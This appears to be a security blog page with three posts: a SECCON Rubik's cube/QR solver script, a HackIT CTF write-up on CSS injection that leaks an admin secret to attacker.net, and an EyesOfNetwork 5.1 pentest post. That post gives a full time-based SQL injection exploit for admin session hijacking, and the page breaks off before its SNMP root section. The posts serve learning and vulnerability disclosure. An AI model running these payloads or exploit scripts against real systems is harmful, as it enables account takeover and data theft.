dba

CTF Write-up - SECCON 2017 Qubic Rube - Solving a Rubik's without force

Sun, 10 Dec 2017 00:00:00 +0100

Here’s the solution for a programming challenge I did during SECCON 2017.

Introduction

The challenge is a programming challenge, we get greeted with a three.js cube with 6 textures, one for each faces with a QR-Code on them. Using zbar to read them, we will see this message:

[SECCON 2017 Online CTF                                   ]
[No. 1 / 50                                               ]
[Qubic Rube                                               ]
[Next URL is:                                             ]
[Have fun!                                                ]
[http://qubicrube.pwn.seccon.jp:33654/02c286df1bbd7923d1f7]

Going to that page will redirect us to a page with another challenge:

Seems like we are going to code a rubiks solver.

Idea

After seeing some other write-ups for this challenge, it seems like there’s a way to scramble the cube enough to give the solution with enough permutations. My solution is a little bit different in the fact that I am going to solve it using a rubiks solver rather than using a brute-forcy way.

The different difficulties I encountered during the challenge development:

The color opposites of the cubes weren’t always the same (generally white is supposed to be at the opposite of yellow, red <> orange and blue <> green), but it wasn’t always the case and I lost some time because of that.
Sometimes the center of the cube wasn’t properly rotated, so I had to add a little bit more operations at the end of the script to try 3 other cube combinations and try to read a QR-code.

The code

Download the images for the 6 faces (or use local versions)
Crop the images into 9 pieces
Read the center color for each faces
Send it to a rubiks solver, here I am using the python library “kociemba”.
Create the different essential moves R (right), L (left), U (up), D (down), F (front) and B (back).
- I could’ve optimised a little bit the code here by creating inverse move but decided to just to the move 3 times when seeing a quote (Ex: R') and 2 times when I encounter a 2 (Ex: R2).
Parse the solver’s output and use the different moves created
Put the pieces back together
Launch zbar on each of them 4 times (rotating the center piece)

import kociemba from PIL import Image import requests import argparse import logging as log import zbar import sys import os import random from subprocess import * # last 504ded069e4db4e3bef9 url = "http://qubicrube.pwn.seccon.jp:33654/" parser = argparse.ArgumentParser() parser.add_argument("prefix", help="the prefix to use, example 504ded069e4db4e3bef9") parser.add_argument("-v", "--verbose", help="increase output verbosity", action="store_true") parser.add_argument("-d", "--download", help="download the challenge", action="store_true") args = parser.parse_args() prefix = str(args.prefix.split("/")[-1:][0]) if args.verbose: log.basicConfig(level=log.DEBUG, format="[+] %(message)s") else: log.basicConfig(level=log.WARNING) log.info("Using prefix: "+prefix) suffix = ["_R", "_L", "_U", "_B", "_F", "_D"] extension = ".png" requests_queue = [] if args.download: for suf in suffix: current_name = prefix + suf + extension current_url = url + "images/" + current_name log.info(current_url) r = requests.get(current_url) path = current_name if r.status_code == 200: with open(path, 'w+') as f: for chunk in r.iter_content(1024): f.write(chunk) log.info("Getting "+ prefix + suf) s = 82 up = Image.open(prefix+"_U.png") right = Image.open(prefix+"_R.png") front = Image.open(prefix+"_F.png") down = Image.open(prefix+"_D.png") left = Image.open(prefix+"_L.png") back = Image.open(prefix+"_B.png") cube2 = [] def cropImages(img): for i in range (0, 9): cube2.append(img.copy().crop(((i % 3) * s, ((i / 3) % 3) * s, ((i % 3) + 1) * s, (((i / 3) % 3) + 1) * s))) cropImages(up) cropImages(right) cropImages(front) cropImages(down) cropImages(left) cropImages(back) #URFDLB def getColorBasic(img): x = 0 while (img.getpixel((x, 0)) == (0, 0, 0)): x += 1 return img.getpixel((x, 0)) U = getColorBasic(cube2[4]) R = getColorBasic(cube2[13]) F = getColorBasic(cube2[22]) D = getColorBasic(cube2[31]) L = getColorBasic(cube2[40]) B = getColorBasic(cube2[49]) # U = (255, 255, 255) # D = (0, 81, 186) # blue # R = (196, 30, 58) # red # B = (255, 213, 0) # yellow # F = (0, 158, 96) # green # L = (255, 88, 0) # orange def getColor(img): x = 0 while (img.getpixel((x, 0)) == (0, 0, 0)): x += 1 color = img.getpixel((x, 0)) if color == U: return "U" elif color == R: return "R" elif color == F: return "F" elif color == D: return "D" elif color == L: return "L" elif color == B: return "B" else: logging.error("wtf color") img.save("wtf.png") sys.exit() solve = "" cube = "" for i in cube2: cube += getColor(i) log.info(cube) solve = kociemba.solve(cube) log.info(solve) def regenerateCube(): global up global right global front global down global left global back up = Image.new("RGB", (s*3, s*3)) for i in range(0,9): up.paste(cube2[i], ((i % 3) * s,((i / 3) % 3) * s)) up.save("up.png") right = Image.new("RGB", (s*3, s*3)) for i in range(9,18): right.paste(cube2[i], ((i % 3) * s,((i / 3) % 3) * s)) right.save("right.png") front = Image.new("RGB", (s*3, s*3)) for i in range(18,27): front.paste(cube2[i], ((i % 3) * s,((i / 3) % 3) * s)) front.save("front.png") down = Image.new("RGB", (s*3, s*3)) for i in range(27,36): down.paste(cube2[i], ((i % 3) * s,((i / 3) % 3) * s)) down.save("down.png") left = Image.new("RGB", (s*3, s*3)) for i in range(36,45): left.paste(cube2[i], ((i % 3) * s,((i / 3) % 3) * s)) left.save("left.png") back = Image.new("RGB", (s*3, s*3)) for i in range(45,54): back.paste(cube2[i], ((i % 3) * s,((i / 3) % 3) * s)) back.save("back.png") # 00-01-02 # 03-04-05 # 06-07-08 #36-37-38 18-19-20 09-10-11 45-46-47 #39-40-41 21-22-23 12-13-14 48-49-50 #42-43-44 24-25-26 15-16-17 51-52-53 # 27-28-29 # 30-31-32 # 33-34-35 def moveR(): log.info("Moving right") copy = [] copy.append(cube2[2]) copy.append(cube2[5]) copy.append(cube2[8]) cube2[2] = cube2[20] cube2[5] = cube2[23] cube2[8] = cube2[26] cube2[20] = cube2[29] cube2[23] = cube2[32] cube2[26] = cube2[35] cube2[29] = cube2[51].rotate(180) cube2[32] = cube2[48].rotate(180) cube2[35] = cube2[45].rotate(180) cube2[51] = copy[0].rotate(180) cube2[48] = copy[1].rotate(180) cube2[45] = copy[2].rotate(180) i = right.rotate(270) cube2[9] = i.crop((0, 0, s, s)) cube2[10] = i.crop((s, 0, s*2, s)) cube2[11] = i.crop((s*2, 0, s*3, s)) cube2[12] = i.crop((0, s, s, s*2)) cube2[13] = i.crop((s, s, s*2, s*2)) cube2[14] = i.crop((s*2, s, s*3, s*2)) cube2[15] = i.crop((0, s*2, s, s*3)) cube2[16] = i.crop((s, s*2, s*2, s*3)) cube2[17] = i.crop((s*2, s*2, s*3, s*3)) def moveD(): log.info("Moving down") copy = [] copy.append(cube2[24]) copy.append(cube2[25]) copy.append(cube2[26]) cube2[24] = cube2[42] cube2[25] = cube2[43] cube2[26] = cube2[44] cube2[42] = cube2[51] cube2[43] = cube2[52] cube2[44] = cube2[53] cube2[51] = cube2[15] cube2[52] = cube2[16] cube2[53] = cube2[17] cube2[15] = copy[0] cube2[16] = copy[1] cube2[17] = copy[2] i = down.rotate(270) cube2[27] = i.crop((0, 0, s, s)) cube2[28] = i.crop((s, 0, s*2, s)) cube2[29] = i.crop((s*2, 0, s*3, s)) cube2[30] = i.crop((0, s, s, s*2)) cube2[31] = i.crop((s, s, s*2, s*2)) cube2[32] = i.crop((s*2, s, s*3, s*2)) cube2[33] = i.crop((0, s*2, s, s*3)) cube2[34] = i.crop((s, s*2, s*2, s*3)) cube2[35] = i.crop((s*2, s*2, s*3, s*3)) def moveL(): log.info("Moving left") copy = [] copy.append(cube2[27]) copy.append(cube2[30]) copy.append(cube2[33]) cube2[27] = cube2[18] cube2[30] = cube2[21] cube2[33] = cube2[24] cube2[18] = cube2[0] cube2[21] = cube2[3] cube2[24] = cube2[6] cube2[0] = cube2[53].rotate(180) cube2[3] = cube2[50].rotate(180) cube2[6] = cube2[47].rotate(180) cube2[53] = copy[0].rotate(180) cube2[50] = copy[1].rotate(180) cube2[47] = copy[2].rotate(180) i = left.rotate(270) cube2[36] = i.crop((0, 0, s, s)) cube2[37] = i.crop((s, 0, s*2, s)) cube2[38] = i.crop((s*2, 0, s*3, s)) cube2[39] = i.crop((0, s, s, s*2)) cube2[40] = i.crop((s, s, s*2, s*2)) cube2[41] = i.crop((s*2, s, s*3, s*2)) cube2[42] = i.crop((0, s*2, s, s*3)) cube2[43] = i.crop((s, s*2, s*2, s*3)) cube2[44] = i.crop((s*2, s*2, s*3, s*3)) def moveU(): log.info("Moving up") copy = [] copy.append(cube2[18]) copy.append(cube2[19]) copy.append(cube2[20]) cube2[18] = cube2[9] cube2[19] = cube2[10] cube2[20] = cube2[11] cube2[9] = cube2[45] cube2[10] = cube2[46] cube2[11] = cube2[47] cube2[45] = cube2[36] cube2[46] = cube2[37] cube2[47] = cube2[38] cube2[36] = copy[0] cube2[37] = copy[1] cube2[38] = copy[2] i = up.rotate(270) cube2[0] = i.crop((0, 0, s, s)) cube2[1] = i.crop((s, 0, s*2, s)) cube2[2] = i.crop((s*2, 0, s*3, s)) cube2[3] = i.crop((0, s, s, s*2)) cube2[4] = i.crop((s, s, s*2, s*2)) cube2[5] = i.crop((s*2, s, s*3, s*2)) cube2[6] = i.crop((0, s*2, s, s*3)) cube2[7] = i.crop((s, s*2, s*2, s*3)) cube2[8] = i.crop((s*2, s*2, s*3, s*3)) def moveF(): log.info("Moving front") copy = [] copy.append(cube2[15]) copy.append(cube2[12]) copy.append(cube2[9]) cube2[15] = cube2[8].rotate(270) cube2[12] = cube2[7].rotate(270) cube2[9] = cube2[6].rotate(270) cube2[8] = cube2[38].rotate(270) cube2[7] = cube2[41].rotate(270) cube2[6] = cube2[44].rotate(270) cube2[38] = cube2[27].rotate(270) cube2[41] = cube2[28].rotate(270) cube2[44] = cube2[29].rotate(270) cube2[27] = copy[0].rotate(270) cube2[28] = copy[1].rotate(270) cube2[29] = copy[2].rotate(270) i = front.rotate(270) cube2[18] = i.crop((0, 0, s, s)) cube2[19] = i.crop((s, 0, s*2, s)) cube2[20] = i.crop((s*2, 0, s*3, s)) cube2[21] = i.crop((0, s, s, s*2)) cube2[22] = i.crop((s, s, s*2, s*2)) cube2[23] = i.crop((s*2, s, s*3, s*2)) cube2[24] = i.crop((0, s*2, s, s*3)) cube2[25] = i.crop((s, s*2, s*2, s*3)) cube2[26] = i.crop((s*2, s*2, s*3, s*3)) def moveB(): log.info("Moving back") copy = [] copy.append(cube2[0]) copy.append(cube2[1]) copy.append(cube2[2]) cube2[0] = cube2[11].rotate(90) cube2[1] = cube2[14].rotate(90) cube2[2] = cube2[17].rotate(90) cube2[11] = cube2[35].rotate(90) cube2[14] = cube2[34].rotate(90) cube2[17] = cube2[33].rotate(90) cube2[35] = cube2[42].rotate(90) cube2[34] = cube2[39].rotate(90) cube2[33] = cube2[36].rotate(90) cube2[42] = copy[0].rotate(90) cube2[39] = copy[1].rotate(90) cube2[36] = copy[2].rotate(90) i = back.rotate(270) cube2[45] = i.crop((0, 0, s, s)) cube2[46] = i.crop((s, 0, s*2, s)) cube2[47] = i.crop((s*2, 0, s*3, s)) cube2[48] = i.crop((0, s, s, s*2)) cube2[49] = i.crop((s, s, s*2, s*2)) cube2[50] = i.crop((s*2, s, s*3, s*2)) cube2[51] = i.crop((0, s*2, s, s*3)) cube2[52] = i.crop((s, s*2, s*2, s*3)) cube2[53] = i.crop((s*2, s*2, s*3, s*3)) def checkStatus(): global cube cube = "" for i in cube2: cube += getColor(i) log.info(cube) log.info(kociemba.solve(cube)) def parseSolve(solve): for i in solve.split(" "): if i[-1:] == "'": eval("move"+i[0:1]+"()") regenerateCube() eval("move"+i[0:1]+"()") regenerateCube() eval("move"+i[0:1]+"()") elif i[-1:] == "2": eval("move"+i[0:1]+"()") regenerateCube() eval("move"+i[0:1]+"()") else: eval("move"+i[0:1]+"()") regenerateCube() checkStatus() parseSolve(solve) scanner = zbar.ImageScanner() scanner.parse_config('enable') def decodeImage(img): image = zbar.Image(s*3, s*3, 'Y800', img.copy().convert('L').tostring()) scanner.scan(image) for symbol in image: print "Found: [%s]" % symbol.data del(image) def zbard(): decodeImage(up) decodeImage(front) decodeImage(down) decodeImage(left) decodeImage(right) decodeImage(back) def rotateCenter(): cube2[4] = cube2[4].rotate(90) cube2[13] = cube2[13].rotate(90) cube2[22] = cube2[22].rotate(90) cube2[31] = cube2[31].rotate(90) cube2[40] = cube2[40].rotate(90) cube2[49] = cube2[49].rotate(90) log.info("Solved") zbard() for i in range(3): rotateCenter() regenerateCube() zbard()

CTF Write-Up - HackIT CTF 2017 Web200

Sun, 27 Aug 2017 00:00:00 +0200

I participated at the HackIT 2017 CTF with team sec0d, and we finished first. As requested by some other teams, here’s a write-up for the Web200 CTF challenge of HackIT 2017.

Introduction

The application seems pretty straightforward, we can register with an username, a password, and a secret. The goal of the challenge is to recover the secret of an administrator.

Solution

Checking the source of the profile page, we can see some interesting information:

First, the secret is shown in an input tag. We can see that we can edit part of our profile as well by using edit.php. This page will edit the “about” field of our user. We can also see that there is an administrator function commented in the html, hinting us of a potential XSS or similar attack, as the administrator will have a list of updated status in his dashboard.

XSS tentatives will be proven to be unsuccessful, as we do not have access to the < and > characters and we are not in an attribute. A bbcode function is however enabled on the application, allowing us to input interesting data, for example, [code]Message[/code] will be translated to <pre>Message</pre>. Testing all possible bbcodes, one, in particular will be interesting to us, color.

The color bbcode injected, we can see the result:

As shown in the screenshot, the parameter “test” is inserted inside a style tag, and since other characters are not correctly filtered, we can do a CSS injection:

[color="test;} * {background: url('http://attacker.net/test')"]a[/color]

Using that as input will change the background image of some HTML tags and generate a request to our website.

80.252.154.43 - - [27/Aug/2017:02:05:01 +0200] "GET /test HTTP/1.1" 302 5 "http://tasks.ctf.com.ua:13373/profile.php" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.12; rv:55.0) Gecko/20100101 Firefox/55.0"

Now that we know we can inject CSS and that there is effectively a bot running on the app, we can try to recover the input value using attribute selector in CSS:

[color="test;} input[value^="h4ck1t" i]{background: url('http://attacker.net/confirmed')"]a[/color]

This will check if the value of the input starts with h4ck1t, the i modifier after the selector is there to be case insensitive, since the page will lowercase all input value sent.

After sending that, we got our response, the flag format being h4ck1t{flag}, we can confirm that we only have to automate the attack :)

The server and bot being somewhat unreliable, we had to try everything manually. On a stable challenge, this challenge could be solved using a loop checking the character one by one.

from pwn import * from requests import * import string import sys import time def edit(s, cookie, bla): s.post("http://tasks.ctf.com.ua:13373/edit.php", cookies=cookie, data={"about": bla}) s = Session() cookie = {"PHPSESSID": "85gdkck3eegdmu215o02ac8rq0"} bla = '''[color="test;} input[value^="'''+sys.argv[1]+'''" i]{border-image: url('http://attacker.net/?a='''+ sys.argv[1]+'''"]a[/color]''' log.info("Sending [%s, %s]" % (i, bla)) edit(s, cookie, bla) edit(s, cookie, bla) r = s.get("http://tasks.ctf.com.ua:13373/profile.php", cookies=cookie) print r.text

Usage: python web200.py 'h4ck1t{c...'

And finally, in our logs, after a little bit of guessing and a sleep() time of 10 seconds…

80.252.154.43 - - [27/Aug/2017:04:11:51 +0200] "GET /?a=h4ck1t{c$$0;} HTTP/1.1" 302 5 "http://tasks.ctf.com.ua:13373/profile.php" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.12; rv:55.0) Gecko/20100101 Firefox/55.0"
80.252.154.43 - - [27/Aug/2017:04:12:04 +0200] "GET /?a=h4ck1t{c$$_0;} HTTP/1.1" 302 5 "http://tasks.ctf.com.ua:13373/profile.php" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.12; rv:55.0) Gecko/20100101 Firefox/55.0"
80.252.154.43 - - [27/Aug/2017:04:13:21 +0200] "GET /?a=h4ck1t{c$$_10;} HTTP/1.1" 302 5 "http://tasks.ctf.com.ua:13373/profile.php" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.12; rv:55.0) Gecko/20100101 Firefox/55.0"
80.252.154.43 - - [27/Aug/2017:04:14:06 +0200] "GET /?a=h4ck1t{c$$_1n0;} HTTP/1.1" 302 5 "http://tasks.ctf.com.ua:13373/profile.php" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.12; rv:55.0) Gecko/20100101 Firefox/55.0"
80.252.154.43 - - [27/Aug/2017:04:14:12 +0200] "GET /?a=h4ck1t{c$$_1nj0;} HTTP/1.1" 302 5 "http://tasks.ctf.com.ua:13373/profile.php" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.12; rv:55.0) Gecko/20100101 Firefox/55.0"
80.252.154.43 - - [27/Aug/2017:04:14:52 +0200] "GET /?a=h4ck1t{c$$_1nj30;} HTTP/1.1" 302 5 "http://tasks.ctf.com.ua:13373/profile.php" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.12; rv:55.0) Gecko/20100101 Firefox/55.0"
80.252.154.43 - - [27/Aug/2017:04:15:17 +0200] "GET /?a=h4ck1t{c$$_1nj3ct10n1;} HTTP/1.1" 302 5 "http://tasks.ctf.com.ua:13373/profile.php" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.12; rv:55.0) Gecko/20100101 Firefox/55.0"
80.252.154.43 - - [27/Aug/2017:04:15:45 +0200] "GET /?a=h4ck1t{c$$_1nj3ct10n_0;} HTTP/1.1" 302 5 "http://tasks.ctf.com.ua:13373/profile.php" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.12; rv:55.0) Gecko/20100101 Firefox/55.0"
80.252.154.43 - - [27/Aug/2017:04:16:20 +0200] "GET /?a=h4ck1t{c$$_1nj3ct10n_0;} HTTP/1.1" 302 5 "http://tasks.ctf.com.ua:13373/profile.php" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.12; rv:55.0) Gecko/20100101 Firefox/55.0"
80.252.154.43 - - [27/Aug/2017:04:18:34 +0200] "GET /?a=h4ck1t{c$$_1nj3ct10n_h0;} HTTP/1.1" 302 5 "http://tasks.ctf.com.ua:13373/profile.php" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.12; rv:55.0) Gecko/20100101 Firefox/55.0"
80.252.154.43 - - [27/Aug/2017:04:27:18 +0200] "GET /?a=h4ck1t{c$$_1nj3ct10n_h0;} HTTP/1.1" 302 5 "http://tasks.ctf.com.ua:13373/profile.php" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.12; rv:55.0) Gecko/20100101 Firefox/55.0"
80.252.154.43 - - [27/Aug/2017:04:32:09 +0200] "GET /?a=h4ck1t{c$$_1nj3ct10n_h0;} HTTP/1.1" 302 5 "http://tasks.ctf.com.ua:13373/profile.php" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.12; rv:55.0) Gecko/20100101 Firefox/55.0"
80.252.154.43 - - [27/Aug/2017:04:33:02 +0200] "GET /?a=h4ck1t{c$$_1nj3ct10n_h10;} HTTP/1.1" 302 5 "http://tasks.ctf.com.ua:13373/profile.php" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.12; rv:55.0) Gecko/20100101 Firefox/55.0"
80.252.154.43 - - [27/Aug/2017:04:41:10 +0200] "GET /?a=h4ck1t{c$$_1nj3ct10n_h1d0;} HTTP/1.1" 302 5 "http://tasks.ctf.com.ua:13373/profile.php" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.12; rv:55.0) Gecko/20100101 Firefox/55.0"
80.252.154.43 - - [27/Aug/2017:04:43:22 +0200] "GET /?a=h4ck1t{c$$_1nj3ct10n_h1d30;} HTTP/1.1" 302 5 "http://tasks.ctf.com.ua:13373/profile.php" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.12; rv:55.0) Gecko/20100101 Firefox/55.0"
80.252.154.43 - - [27/Aug/2017:04:45:39 +0200] "GET /?a=h4ck1t{c$$_1nj3ct10n_h1d30;} HTTP/1.1" 302 5 "http://tasks.ctf.com.ua:13373/profile.php" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.12; rv:55.0) Gecko/20100101 Firefox/55.0"
80.252.154.43 - - [27/Aug/2017:04:48:12 +0200] "GET /?a=h4ck1t{c$$_1nj3ct10n_h1d3s0;} HTTP/1.1" 302 5 "http://tasks.ctf.com.ua:13373/profile.php" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.12; rv:55.0) Gecko/20100101 Firefox/55.0"
80.252.154.43 - - [27/Aug/2017:04:48:47 +0200] "GET /?a=h4ck1t{c$$_1nj3ct10n_h1d3s_0;} HTTP/1.1" 302 5 "http://tasks.ctf.com.ua:13373/profile.php" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.12; rv:55.0) Gecko/20100101 Firefox/55.0"
80.252.154.43 - - [27/Aug/2017:04:49:08 +0200] "GET /?a=h4ck1t{c$$_1nj3ct10n_h1d3s_s0;} HTTP/1.1" 302 5 "http://tasks.ctf.com.ua:13373/profile.php" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.12; rv:55.0) Gecko/20100101 Firefox/55.0"
80.252.154.43 - - [27/Aug/2017:04:49:37 +0200] "GET /?a=h4ck1t{c$$_1nj3ct10n_h1d3s_s0;} HTTP/1.1" 302 5 "http://tasks.ctf.com.ua:13373/profile.php" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.12; rv:55.0) Gecko/20100101 Firefox/55.0"
80.252.154.43 - - [27/Aug/2017:04:49:57 +0200] "GET /?a=h4ck1t{c$$_1nj3ct10n_h1d3s_s30;} HTTP/1.1" 302 5 "http://tasks.ctf.com.ua:13373/profile.php" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.12; rv:55.0) Gecko/20100101 Firefox/55.0"
80.252.154.43 - - [27/Aug/2017:04:50:09 +0200] "GET /?a=h4ck1t{c$$_1nj3ct10n_h1d3s_s3c0;} HTTP/1.1" 302 5 "http://tasks.ctf.com.ua:13373/profile.php" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.12; rv:55.0) Gecko/20100101 Firefox/55.0"
80.252.154.43 - - [27/Aug/2017:04:50:22 +0200] "GET /?a=h4ck1t{c$$_1nj3ct10n_h1d3s_s3cr3t0;} HTTP/1.1" 302 5 "http://tasks.ctf.com.ua:13373/profile.php" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.12; rv:55.0) Gecko/20100101 Firefox/55.0"
80.252.154.43 - - [27/Aug/2017:04:51:12 +0200] "GET /?a=h4ck1t{c$$_1nj3ct10n_h1d3s_s3cr3ts0;} HTTP/1.1" 302 5 "http://tasks.ctf.com.ua:13373/profile.php" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.12; rv:55.0) Gecko/20100101 Firefox/55.0"
80.252.154.43 - - [27/Aug/2017:04:51:24 +0200] "GET /?a=h4ck1t{c$$_1nj3ct10n_h1d3s_s3cr3ts}0;} HTTP/1.1" 302 5 "http://tasks.ctf.com.ua:13373/profile.php" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.12; rv:55.0) Gecko/20100101 Firefox/55.0"

Bonus

After solving the challenge, a friend I did the CTF with told me there could be a faster solution than bruteforcing the characters ourselves, even on unreliable servers. It is possible to simply create a lot of selectors, like h4ck1t{[a-z0-9] and by sending one request, the server will answer us with one character.

From unauthenticated to root on a supervision appliance

Tue, 28 Mar 2017 00:00:00 +0200

On a recent penetration test, I had to opportunity to test the security of an open-source supervision appliance called EyesOfNetwork. Multiple vulnerabilities have been found and will be reported in this post.

What is EyesOfNetwork?

From the official website:

EyesOfNetwork (“EON”) is the OpenSource solution combining a pragmatic usage of ITIL processes and a technological interface allowing their workaday application. EyesOfNetwork Supervision is the first brick of a range of products targeting to assist IT managment and gouvernance. EyesOfNetwork Supervision provides event management, availability, problems and capacity.

Basically, it is a French supervision solution combining Nagios, Cacti as well as other tools with some of them being hand-made to create a complete appliance to monitor your infrastructure. The solution offers a web interface called Eonweb.

Preparation

For the next tests, we will download the latest iso available on https://www.eyesofnetwork.com/. The version downloaded was EyesOfNetwork 5.1 and represented the latest version available of the software.

Most of the vulnerabilities found during the assessments and presented in this post have been identified on lower versions as well.

After a default install, if we launch nmap to scan TCP ports, here is the list of ports we find:

nmap 192.168.1.161 -p- # The IP address chosen for EON is 192.168.1.161

Starting Nmap 7.40 ( https://nmap.org ) at 2017-03-xx xx:xx CEST
Nmap scan report for 192.168.1.161
Host is up (0.00037s latency).
Not shown: 65530 closed ports
PORT     STATE SERVICE
22/tcp   open  ssh
80/tcp   open  http # Used by Eonweb (web interface)
443/tcp  open  https # Used by Eonweb (web interface)
2403/tcp open  taskmaster2000
3306/tcp open  mysql

Nmap done: 1 IP address (1 host up) scanned in 0.69 seconds

Our goal being a quick way into the system, we’ll search for the low hanging fruit by searching for web vulnerabilities on Eonweb. SSH being difficult to attack due to the possibility of an administrator to change the user accounts passwords at the iso installation and MySQL blocking non-localhost connections.

Quick and dirty: Unauthenticated SQL injection

No authentication bypass has been found even if SQL errors could be generated by logging in using a backslash character at the end of the username. A SQL injection has been found, however, inside the logout.php file, at line 28.

<?php
//logout.php
...
if(isset($_COOKIE["session_id"])) {
	$sessid=$_COOKIE["session_id"];
	sqlrequest($database_eonweb,"DELETE FROM sessions where session_id='$sessid'"); // Vulnerable
}
...
?>

Obviously, we can control the session_id cookie because it is not set up inside a session and because of the fact the server doesn’t filter quotes by default.

The injection being inside a DELETE statement, we have two options: either we exploit it using a blind-based technique by setting up arbitrary sessions and checking which session get deleted (useful for example in the case of a privilege escalation exploit if we have an unprivileged account) or we could exploit it using a time-based attack.

From the point of view of an attacker, we’ll take the second option as we do not have credentials on the application.

rioru@zhsk:/tmp$ time curl -s -o /dev/null https://192.168.1.161/logout.php --insecure -b "session_id=' OR BENCHMARK(1,1)=1 -- -"

real	0m0,091s
user	0m0,064s
sys	0m0,012s
rioru@zhsk:/tmp$ time curl -s -o /dev/null https://192.168.1.161/logout.php --insecure -b "session_id=' OR BENCHMARK(100000000,1)=1 -- -"

real	0m1,778s # We can see there that the response time is considerably longer
user	0m0,068s
sys	0m0,008s

The function SLEEP is not always usable in a DELETE FROM statement, that’s why BENCHMARK has been used in this example. SLEEP is indeed usable only when a table is not empty, we’ll use SLEEP for our proof of concept as we will need to try to recover the sessions table anyway, but in the final exploit, we’ll have to handle the two possibilities.

What’s particularly interesting is the sessions’ creation:

<?php
//login.php
...
	// Create session ID
$sessid=rand();
sqlrequest($database_eonweb,"INSERT INTO sessions (session_id,user_id) VALUES ('$sessid','$usrid')");
...
?>

The monitoring solution is creating their sessions using only rand() as the session_id, meaning that even if we are forced to do our exploitation via a time-based technique, the session_id could be found in under 11 or 12 seconds with a simple brute force character by character if we set-up a SLEEP time of 1 second.

What to keep in mind:

DELETE statements can’t do subqueries affecting their own table.
The target table doesn’t use a proper index column, this can lead to confusion when using substring with LIMIT, even when ORDER BY is used.

Here is the exploitation scenario:

Doing an initial request to get a value representing the lag between the target and our machine.
Delete all the non-admin (user_id != 1) sessions.
Getting the number of entries by doing OR sleep(1)=1. For each record, the server will sleep one second, by doing so we will able to either: delete <entries count> - 1 or sleep(1 / <entries count>) to avoid entries confusion and get a faster exploitation. We will choose the first option; the second has been proven to be unstable after some tests.
Delete all sessions but one.
Now that we have only one admin sessions in the table, it will be easy to recover it.

Proof of concept:

import time from requests import * from requests.packages.urllib3.exceptions import InsecureRequestWarning packages.urllib3.disable_warnings(InsecureRequestWarning) url = "https://192.168.1.161" print "[!] Proof of Concept for the Unauthenticated SQL Injection in EyesOfNetwork 5.1 (DELETE statement) - Rioru (@ddxhunter)" def getTime(page, cookie=""): start = time.time() get(url+page, verify=False, cookies=dict(session_id=cookie)) end = time.time() return round(end - start, 2) # Getting an initial response time to base our next requests around it initial_time = getTime("/") - 0.01 getTime("/logout.php", "rioru' OR user_id!=1 -- -") print "[+] The initial request time on %s is %f, getting the number of entries, it could take a while..." % (url, initial_time) sleep1_time = getTime("/logout.php", "rioru' OR SLEEP(1)=1337 -- -") if (sleep1_time - initial_time >= 1): count = round(sleep1_time) print "[+] Found %d entries in the [sessions] table, deleting every sessions except one" % count else: print "[-] The table [sessions] seems empty" exit() for i in range(int(count) - 1): getTime("/logout.php", "rioru' OR 1=1 LIMIT 1 -- -") # Get the length session_length = 0 for i in range(12): execTime = getTime("/logout.php", "rioru' OR (SELECT CASE WHEN ((SELECT LENGTH(session_id) FROM DUAL ORDER BY session_id LIMIT 1)="+ str(i+1) +") THEN SLEEP(1) ELSE 1 END)=1337 -- -") if (round(execTime - initial_time) >= 1): session_length = i+1 break if (session_length == 0): print "[-] Couldn't find the length of the session_id" exit() print "[+] Found an admin session length: %d, getting the session_id" % session_length # Get the session_id print "[+] session_id: ", session_id = "" for i in range(session_length): for j in range(10): execTime = getTime("/logout.php", "rioru' OR (SELECT CASE WHEN (SUBSTRING((SELECT session_id FROM DUAL ORDER BY session_id LIMIT 1),"+ str(i+1) +",1)="+ str(j) +") THEN SLEEP(1) ELSE 1 END)=1337 -- -") if (round(execTime - initial_time) >= 1): session_id += str(j) print str(j), break print "\n[+] final session_id: [%s]" % session_id # Get the username execTime = getTime("/logout.php", "rioru' OR (SELECT CASE WHEN ((SELECT user_name FROM users WHERE user_id=1)='admin') THEN SLEEP(1) ELSE 1 END)=1337 -- -") if (round(execTime - initial_time) >= 1): print "[+] Username is [admin]" else: print "[-] Username is not admin, brute force necessary" print "[+] End of the PoC use these cookies to authenticate to Eonweb:" print "session_id: %s;" % session_id print "user_name: %s;" % "admin" print "user_id: %d;" % 1 print "user_limitation: %d;" % 0 print "group_id: %d;" % 1

And here it is in action:

rioru@zhsk:~/perso$ python poc_eon_5.1.py
[!] Proof of Concept for the Unauthenticated SQL Injection in EyesOfNetwork 5.1 (DELETE statement) - Rioru (@ddxhunter)
[+] The initial request time on https://192.168.1.161 is 0.020000, getting the number of entries, it could take a while...
[+] Found 379 entries in the [sessions] table, deleting every sessions except one
[+] Found an admin session length: 9, getting the session_id
[+] session_id:  3 5 3 8 9 8 3 2 7
[+] final session_id: [353898327]
[+] Username is [admin]
[+] End of the PoC use these cookies to authenticate to Eonweb:
session_id: 353898327;
user_name: admin;
user_id: 1;
user_limitation: 0;
group_id: 1;

Using these cookies in a browser or with curl, we are correctly authenticated on Eonweb with the admin account.

From there, we can access all the monitoring tools available in EON (Nagios, Cacti, Thrunk, …).

Go for the kill: Privilege escalation using snmp

Now that we have access to the web interface, we will try to elevate our privileges searching for an RCE. I found a particularly interesting way to perform a root-privileged remote code execution on the appliance using SNMP.

Let’s see the privileges of the process running snmpd and its configuration:

